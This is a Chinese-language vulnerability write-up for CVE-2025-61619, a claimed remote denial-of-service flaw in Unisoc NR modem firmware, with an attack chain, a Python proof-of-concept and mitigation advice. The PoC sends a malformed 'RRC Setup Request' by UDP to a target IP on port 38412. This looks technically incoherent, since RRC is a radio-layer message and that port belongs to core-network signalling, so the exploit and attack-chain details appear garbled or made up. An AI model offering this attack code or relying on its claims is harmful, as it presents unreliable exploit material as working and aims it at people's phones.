CVE-2025-61619: Unisoc NR调制解调器输入验证不当导致远程拒绝服务

漏洞信息

漏洞编号

CVE-2025-61619

漏洞类型

拒绝服务

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Unisoc NR Modem

漏洞概述

CVE-2025-61619是紫光展锐（Unisoc）NR调制解调器中的一个高危安全漏洞，CVSS评分7.5。该漏洞源于调制解调器固件中缺乏适当的输入验证机制，攻击者可以通过网络发送特制的恶意数据触发系统崩溃。由于该漏洞位于通信基带层面，攻击者无需获取任何认证凭据，也不需要用户交互，即可远程触发此漏洞导致目标设备完全丧失通信能力。此漏洞影响所有使用紫光展锐集成NR调制解调器芯片的移动设备，包括智能手机、平板电脑和物联网设备。攻击成功后，设备将面临完全的网络中断，影响语音通话、短信和移动数据服务，属于典型的远程拒绝服务（DoS）漏洞。

技术细节

该漏洞存在于紫光展锐NR（New Radio）5G调制解调器固件的网络协议栈处理模块中。当调制解调器接收来自网络的NR协议数据时，缺乏对输入数据边界和格式的严格校验。攻击者构造包含异常字段长度、畸形协议头或超长数据的NR信令消息，触发固件中的内存处理逻辑缺陷。具体表现为：1) 攻击者向目标设备发送精心构造的RRC（无线资源控制） Setup Request或NAS（非接入层）消息；2) 调制解调器固件在解析这些消息时，未正确验证数据包的字段长度和范围；3) 异常的输入数据导致内部状态机处理异常，引发空指针解引用或缓冲区溢出；4) 最终导致调制解调器固件崩溃并进入不可恢复状态，需要设备重启才能恢复正常功能。由于该漏洞位于基带处理器层面，传统的应用层安全防护措施无法检测或阻止此类攻击。

攻击链分析

STEP 1

步骤1

攻击者识别使用紫光展锐NR调制解调器的目标设备（如5G智能手机、物联网设备）

STEP 2

步骤2

攻击者构造包含异常字段长度和超长数据的畸形NR RRC Setup Request或NAS消息

STEP 3

步骤3

通过UDP端口38412或其他NR信令端口将恶意数据包发送至目标设备的调制解调器

STEP 4

步骤4

调制解调器固件接收并解析恶意消息，由于缺乏输入验证，触发内部处理逻辑缺陷

STEP 5

步骤5

固件发生内存错误（空指针解引用或缓冲区溢出），导致调制解调器子系统崩溃

STEP 6

步骤6

目标设备完全丧失NR/5G连接能力，需重启设备才能恢复通信功能

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-61619 PoC - Unisoc NR Modem DoS
# This PoC demonstrates sending malformed NR RRC messages
# to trigger input validation vulnerability in Unisoc modem

import socket
import struct
import random

def create_malformed_rrc_setup_request():
    """
    Create a malformed RRC Setup Request with oversized fields
    to trigger input validation vulnerability
    """
    # NR RRC Setup Request message header
    rrc_message = bytearray()
    
    # Message type: RRC Setup Request (0x00)
    rrc_message.extend([0x00, 0x01])
    
    # Uplink frequency info with oversized value
    rrc_message.extend([0x40, 0x00, 0xFF, 0xFF, 0xFF, 0xFF])
    
    # Cause field with invalid large value
    rrc_message.extend([0x00, 0xFF, 0xFF, 0xFF])
    
    # Spare bits with padding to overflow buffer
    rrc_message.extend([0xFF] * 1024)
    
    return bytes(rrc_message)

def send_to_target(target_ip, target_port=38412):
    """
    Send malformed NR RRC message to target device
    """
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    malformed_msg = create_malformed_rrc_setup_request()
    
    print(f"[*] Sending malformed RRC message to {target_ip}:{target_port}")
    print(f"[*] Message length: {len(malformed_msg)} bytes")
    
    sock.sendto(malformed_msg, (target_ip, target_port))
    sock.close()
    print("[+] Malformed message sent successfully")

if __name__ == "__main__":
    import sys
    if len(sys.argv) < 2:
        print("Usage: python cve_2025_61619_poc.py <target_ip>")
        sys.exit(1)
    
    target_ip = sys.argv[1]
    send_to_target(target_ip)

影响范围

Unisoc NR Modem固件（所有未修复版本）

防御指南

临时缓解措施

在官方补丁发布前，可采取以下临时缓解措施：1) 监控网络信令异常，及时发现针对调制解调器的攻击行为；2) 在核心网侧部署信令过滤规则，丢弃格式异常的RRC/NAS消息；3) 使用VPN或IPSec加密通道增加攻击难度；4) 关注紫光展锐官方安全公告，及时获取补丁信息；5) 考虑使用备选通信方式（如Wi-Fi通话）作为应急方案。最终解决方案仍需等待紫光展锐发布固件安全更新。